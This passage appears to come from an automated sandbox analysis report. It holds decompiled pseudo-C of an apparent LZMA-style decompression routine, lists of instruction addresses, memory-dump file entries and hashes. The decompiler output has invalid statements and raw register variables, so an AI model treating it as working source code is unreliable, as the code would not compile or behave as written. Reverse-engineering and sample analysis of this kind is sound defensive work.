							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













              0x00000000
              0x00406fa7
              0x00406fa7
              0x00406fab
              0x00407062
              0x00407065
              0x00407071
              0x00406f52
              0x00406f52
              0x00406f55
              0x004072c7
              0x004072c7
              0x004072ca
              0x004072ca
              0x004072d0
              0x004072d6
              0x004072dc
              0x004072f6
              0x004072f9
              0x004072ff
              0x0040730a
              0x0040730c
              0x004072de
              0x004072de
              0x004072ed
              0x004072f1
              0x004072f1
              0x00407316
              0x0040733d
              0x0040733d
              0x00407343
              0x00407343
              0x00000000
              0x00407318
              0x00407318
              0x0040731c
              0x004074cb
              0x00000000
              0x004074cb
              0x00407328
              0x0040732f
              0x00407337
              0x0040733a
              0x00000000
              0x0040733a
              0x00406fb1
              0x00406fb5
              0x004074f6
              0x004074f6
              0x004074f9
              0x004074fd
              0x004074fd
              0x00406fbb
              0x00406fc1
              0x00406fc4
              0x00406fc8
              0x00406fcb
              0x00406fcf
              0x00407495
              0x004074e1
              0x004074e9
              0x004074f0
              0x004074f2
              0x00000000
              0x004074f2
              0x00406fd5
              0x00406fd8
              0x00406fde
              0x00406fe0
              0x00406fe0
              0x00406fe3
              0x00406fe6
              0x00406fe9
              0x00406fec
              0x00406fef
              0x00406ff2
              0x00406ff3
              0x00406ff5
              0x00406ff5
              0x00406ff5
              0x00406ff8
              0x00406ffb
              0x00406ffe
              0x00407001
              0x00407001
              0x00407004
              0x00407006
              0x00407006
              0x00407009
              0x00407009
              0x00407009
              0x00406adf
              0x00406adf
              0x00406ae8
              0x00000000
              0x00000000
              0x00406aee
              0x00000000
              0x00406af9
              0x00000000
              0x00000000
              0x00406b02
              0x00406b05
              0x00406b08
              0x00406b0c
              0x00000000
              0x00000000
              0x00406b12
              0x00406b15
              0x00406b17
              0x00406b18
              0x00406b1b
              0x00406b1d
              0x00406b1e
              0x00406b20
              0x00406b23
              0x00406b28
              0x00406b2d
              0x00406b36
              0x00406b49
              0x00406b4c
              0x00406b58
              0x00406b80
              0x00406b82
              0x00406b90
              0x00406b90
              0x00406b94
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406b84
              0x00406b84
              0x00406b87
              0x00406b88
              0x00406b88
              0x00000000
              0x00406b84
              0x00406b5e
              0x00406b63
              0x00406b63
              0x00406b6c
              0x00406b74
              0x00406b77
              0x00000000
              0x00406b7d
              0x00406b7d
              0x00000000
              0x00406b7d
              0x00000000
              0x00406b9a
              0x00406b9a
              0x00406b9e
              0x0040744a
              0x00000000
              0x0040744a
              0x00406ba7
              0x00406bb7
              0x00406bba
              0x00406bbd
              0x00406bbd
              0x00406bbd
              0x00406bc0
              0x00406bc4
              0x00000000
              0x00000000
              0x00406bc6
              0x00406bcc
              0x00406bf6
              0x00406bfc
              0x00406c03
              0x00000000
              0x00406c03
              0x00406bd2
              0x00406bd5
              0x00406bda
              0x00406bda
              0x00406be5
              0x00406bed
              0x00406bf0
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406c35
              0x00406c3b
              0x00406c3e
              0x00406c4b
              0x00406c53
              0x00000000
              0x00000000
              0x00406c0a
              0x00406c0a
              0x00406c0e
              0x00407459
              0x00000000
              0x00407459
              0x00406c1a
              0x00406c25
              0x00406c25
              0x00406c25
              0x00406c28
              0x00406c2b
              0x00406c2e
              0x00406c33
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406c5b
              0x00406c5d
              0x00406c60
              0x00406cd1
              0x00406cd4
              0x00406cd7
              0x00406cde
              0x00406ce8
              0x00000000
              0x00406ce8
              0x00406c62
              0x00406c66
              0x00406c69
              0x00406c6b
              0x00406c6e
              0x00406c71
              0x00406c73
              0x00406c76
              0x00406c78
              0x00406c7d
              0x00406c80
              0x00406c83
              0x00406c87
              0x00406c8e
              0x00406c91
              0x00406c98
              0x00406c9c
              0x00406ca4
              0x00406ca4
              0x00406ca4
              0x00406c9e
              0x00406c9e
              0x00406c9e
              0x00406c93
              0x00406c93
              0x00406c93
              0x00406ca8
              0x00406cab
              0x00406cc9
              0x00406ccb
              0x00000000
              0x00406cad
              0x00406cad
              0x00406cb0
              0x00406cb3
              0x00406cb6
              0x00406cb8
              0x00406cb8
              0x00406cb8
              0x00406cbb
              0x00406cbe
              0x00406cc0
              0x00406cc1
              0x00406cc4
              0x00000000
              0x00406cc4
              0x00000000
              0x00406efa
              0x00406efe
              0x00406f1c
              0x00406f1f
              0x00406f26
              0x00406f29
              0x00406f2c
              0x00406f2f
              0x00406f32
              0x00406f35
              0x00406f37
              0x00406f3e
              0x00406f3f
              0x00406f41
              0x00406f44
              0x00406f47
              0x00406f4a
              0x00406f4a
              0x00406f4f
              0x00000000
              0x00406f4f
              0x00406f00
              0x00406f03
              0x00406f06
              0x00406f10
              0x00000000
              0x00000000
              0x00406f64
              0x00406f68
              0x00406f8b
              0x00406f8e
              0x00406f91
              0x00406f9b
              0x00406f6a
              0x00406f6a
              0x00406f6d
              0x00406f70
              0x00406f73
              0x00406f80
              0x00406f83
              0x00406f83
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00407018
              0x0040701c
              0x00407023
              0x00407026
              0x00407029
              0x00407033
              0x00000000
              0x00407033
              0x0040701e
              0x00000000
              0x00000000
              0x0040703f
              0x00407043
              0x0040704a
              0x0040704d
              0x00407050
              0x00407045
              0x00407045
              0x00407045
              0x00407053
              0x00407056
              0x00407059
              0x00407059
              0x0040705c
              0x0040705f
              0x00000000
              0x00000000
              0x004070ff
              0x004070ff
              0x00407103
              0x004074a1
              0x00000000
              0x004074a1
              0x00407109
              0x0040710c
              0x0040710f
              0x00407113
              0x00407116
              0x0040711c
              0x0040711e
              0x0040711e
              0x0040711e
              0x00407121
              0x00407124
              0x00000000
              0x00000000
              0x00406cf4
              0x00406cf4
              0x00406cf8
              0x00407465
              0x00000000
              0x00407465
              0x00406cfe
              0x00406d01
              0x00406d04
              0x00406d08
              0x00406d0b
              0x00406d11
              0x00406d13
              0x00406d13
              0x00406d13
              0x00406d16
              0x00406d19
              0x00406d19
              0x00406d1c
              0x00406d1f
              0x00000000
              0x00000000
              0x00406d25
              0x00406d2b
              0x00000000
              0x00000000
              0x00406d31
              0x00406d31
              0x00406d35
              0x00406d38
              0x00406d3b
              0x00406d3e
              0x00406d41
              0x00406d42
              0x00406d45
              0x00406d47
              0x00406d4d
              0x00406d50
              0x00406d53
              0x00406d56
              0x00406d59
              0x00406d5c
              0x00406d5f
              0x00406d7b
              0x00406d7e
              0x00406d81
              0x00406d84
              0x00406d8b
              0x00406d8f
              0x00406d91
              0x00406d95
              0x00406d61
              0x00406d61
              0x00406d65
              0x00406d6d
              0x00406d72
              0x00406d74
              0x00406d76
              0x00406d76
              0x00406d98
              0x00406d9f
              0x00406da2
              0x00000000
              0x00406da8
              0x00000000
              0x00406da8
              0x00000000
              0x00406dad
              0x00406dad
              0x00406db1
              0x00407471
              0x00000000
              0x00407471
              0x00406db7
              0x00406dba
              0x00406dbd
              0x00406dc1
              0x00406dc4
              0x00406dca
              0x00406dcc
              0x00406dcc
              0x00406dcc
              0x00406dcf
              0x00406dd2
              0x00406dd2
              0x00406dd2
              0x00406dd8
              0x00000000
              0x00000000
              0x00406dda
              0x00406ddd
              0x00406de0
              0x00406de3
              0x00406de6
              0x00406de9
              0x00406dec
              0x00406def
              0x00406df2
              0x00406df5
              0x00406df8
              0x00406e10
              0x00406e13
              0x00406e16
              0x00406e19
              0x00406e19
              0x00406e1c
              0x00406e20
              0x00406e22
              0x00406dfa
              0x00406dfa
              0x00406e02
              0x00406e07
              0x00406e09
              0x00406e0b
              0x00406e0b
              0x00406e25
              0x00406e2c
              0x00406e2f
              0x00000000
              0x00406e31
              0x00000000
              0x00406e31
              0x00406e2f
              0x00406e36
              0x00406e36
              0x00406e36
              0x00406e36
              0x00000000
              0x00000000
              0x00406e71
              0x00406e71
              0x00406e75
              0x0040747d
              0x00000000
              0x0040747d
              0x00406e7b
              0x00406e7e
              0x00406e81
              0x00406e85
              0x00406e88
              0x00406e8e
              0x00406e90
              0x00406e90
              0x00406e90
              0x00406e93
              0x00406e96
              0x00406e96
              0x00406e9c
              0x00406e3a
              0x00406e3a
              0x00406e3d
              0x00000000
              0x00406e3d
              0x00406e9e
              0x00406e9e
              0x00406ea1
              0x00406ea4
              0x00406ea7
              0x00406eaa
              0x00406ead
              0x00406eb0
              0x00406eb3
              0x00406eb6
              0x00406eb9
              0x00406ebc
              0x00406ed4
              0x00406ed7
              0x00406eda
              0x00406edd
              0x00406edd
              0x00406ee0
              0x00406ee4
              0x00406ee6
              0x00406ebe
              0x00406ebe
              0x00406ec6
              0x00406ecb
              0x00406ecd
              0x00406ecf
              0x00406ecf
              0x00406ee9
              0x00406ef0
              0x00406ef3
              0x00000000
              0x00406ef5
              0x00000000
              0x00406ef5
              0x00000000
              0x00407182
              0x00407182
              0x00407186
              0x004074ad
              0x00000000
              0x004074ad
              0x0040718c
              0x0040718f
              0x00407192
              0x00407196
              0x00407199
              0x0040719f
              0x004071a1
              0x004071a1
              0x004071a1
              0x004071a4
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00407291
              0x00407295
              0x004072b7
              0x004072ba
              0x004072c4
              0x00000000
              0x004072c4
              0x00407297
              0x0040729a
              0x0040729e
              0x004072a1
              0x004072a1
              0x004072a4
              0x00000000
              0x00000000
              0x0040734e
              0x00407352
              0x00407370
              0x00407370
              0x00407370
              0x00407377
              0x0040737e
              0x00407385
              0x00407385
              0x00000000
              0x00407385
              0x00407354
              0x00407357
              0x0040735a
              0x0040735d
              0x00407364
              0x004072a8
              0x004072a8
              0x004072ab
              0x00000000
              0x00000000
              0x0040743f
              0x00407442
              0x00000000
              0x00000000
              0x00407079
              0x0040707b
              0x00407082
              0x00407083
              0x00407085
              0x00407088
              0x00000000
              0x00000000
              0x00407090
              0x00407093
              0x00407096
              0x00407098
              0x0040709a
              0x0040709a
              0x0040709b
              0x0040709e
              0x004070a5
              0x004070a8
              0x004070b6
              0x00000000
              0x00000000
              0x0040738c
              0x0040738c
              0x0040738f
              0x00407396
              0x00000000
              0x00000000
              0x0040739b
              0x0040739b
              0x0040739f
              0x004074d7
              0x00000000
              0x004074d7
              0x004073a5
              0x004073a8
              0x004073ab
              0x004073af
              0x004073b2
              0x004073b8
              0x004073ba
              0x004073ba
              0x004073ba
              0x004073bd
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c3
              0x004073c3
              0x004073c7
              0x00407427
              0x0040742a
              0x0040742f
              0x00407430
              0x00407432
              0x00407434
              0x00407437
              0x00000000
              0x00407437
              0x004073c9
              0x004073cf
              0x004073d2
              0x004073d5
              0x004073d8
              0x004073db
              0x004073de
              0x004073e1
              0x004073e4
              0x004073e7
              0x004073ea
              0x00407403
              0x00407406
              0x00407409
              0x0040740c
              0x00407410
              0x00407412
              0x00407412
              0x00407413
              0x00407416
              0x004073ec
              0x004073ec
              0x004073f4
              0x004073f9
              0x004073fb
              0x004073fe
              0x004073fe
              0x00407419
              0x00407420
              0x00000000
              0x00407422
              0x00000000
              0x00407422
              0x00000000
              0x004070be
              0x004070c1
              0x004070f7
              0x00407227
              0x00407227
              0x00407227
              0x00407227
              0x0040722a
              0x0040722a
              0x0040722d
              0x0040722f
              0x004074b9
              0x00000000
              0x004074b9
              0x00407235
              0x00407238
              0x00000000
              0x00000000
              0x0040723e
              0x00407242
              0x00407245
              0x00407245
              0x00407245
              0x00000000
              0x00407245
              0x004070c3
              0x004070c5
              0x004070c7
              0x004070c9
              0x004070cc
              0x004070cd
              0x004070cf
              0x004070d1
              0x004070d4
              0x004070d7
              0x004070ed
              0x004070f2
              0x0040712a
              0x0040712a
              0x0040712e
              0x0040715a
              0x0040715c
              0x00407163
              0x00407166
              0x00407169
              0x00407169
              0x0040716e
              0x0040716e
              0x00407170
              0x00407173
              0x0040717a
              0x0040717d
              0x004071aa
              0x004071aa
              0x004071ad
              0x004071b0
              0x00407224
              0x00407224
              0x00407224
              0x00000000
              0x00407224
              0x004071b2
              0x004071b8
              0x004071bb
              0x004071be
              0x004071c1
              0x004071c4
              0x004071c7
              0x004071ca
              0x004071cd
              0x004071d0
              0x004071d3
              0x004071ec
              0x004071ee
              0x004071f1
              0x004071f2
              0x004071f5
              0x004071f7
              0x004071fa
              0x004071fc
              0x004071fe
              0x00407201
              0x00407203
              0x00407206
              0x0040720a
              0x0040720c
              0x0040720c
              0x0040720d
              0x00407210
              0x00407213
              0x004071d5
              0x004071d5
              0x004071dd
              0x004071e2
              0x004071e4
              0x004071e7
              0x004071e7
              0x00407216
              0x0040721d
              0x004071a7
              0x004071a7
              0x004071a7
              0x004071a7
              0x00000000
              0x0040721f
              0x00000000
              0x0040721f
              0x0040721d
              0x00407130
              0x00407133
              0x00407135
              0x00407138
              0x0040713b
              0x0040713e
              0x00407140
              0x00407143
              0x00407146
              0x00407146
              0x00407149
              0x00407149
              0x0040714c
              0x00407153
              0x00407127
              0x00407127
              0x00407127
              0x00407127
              0x00000000
              0x00407155
              0x00000000
              0x00407155
              0x00407153
              0x004070d9
              0x004070dc
              0x004070de
              0x004070e1
              0x00000000
              0x00000000
              0x00406e40
              0x00406e40
              0x00406e44
              0x00407489
              0x00000000
              0x00407489
              0x00406e4a
              0x00406e4d
              0x00406e50
              0x00406e53
              0x00406e56
              0x00406e59
              0x00406e5c
              0x00406e5e
              0x00406e61
              0x00406e64
              0x00406e67
              0x00406e69
              0x00406e69
              0x00406e69
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00407248
              0x00407248
              0x00407248
              0x0040724c
              0x00000000
              0x00000000
              0x00407252
              0x00407255
              0x00407258
              0x0040725b
              0x0040725d
              0x0040725d
              0x0040725d
              0x00407260
              0x00407263
              0x00407266
              0x00407269
              0x0040726c
              0x0040726f
              0x00407270
              0x00407272
              0x00407272
              0x00407272
              0x00407275
              0x00407278
              0x0040727b
              0x0040727e
              0x00407281
              0x00407285
              0x00407287
              0x0040728a
              0x00000000
              0x0040728c
              0x00000000
              0x0040728c
              0x0040728a
              0x004074bf
              0x00000000
              0x00000000
              0x00406aee

              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1e62c1466b9137082a982da4164a06349666531f21fbb12f17c8ad7a1ced7a97
              • Instruction ID: f684c89e7032feabc3e3bde7c6855c560f6d73b68505d9943badace2bdbe07f8
              • Opcode Fuzzy Hash: 1e62c1466b9137082a982da4164a06349666531f21fbb12f17c8ad7a1ced7a97
              • Instruction Fuzzy Hash: CD814771D04228CFDF24CFA8C944BADBBB1FB44305F25816AD856BB281C7786986DF05
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00406AAC, Relevance: 5.2, APIs: 4, Instructions: 198COMMON
              Download Yara Rule
              C-Code - Quality: 98%
              			E00406AAC(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004074FE))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
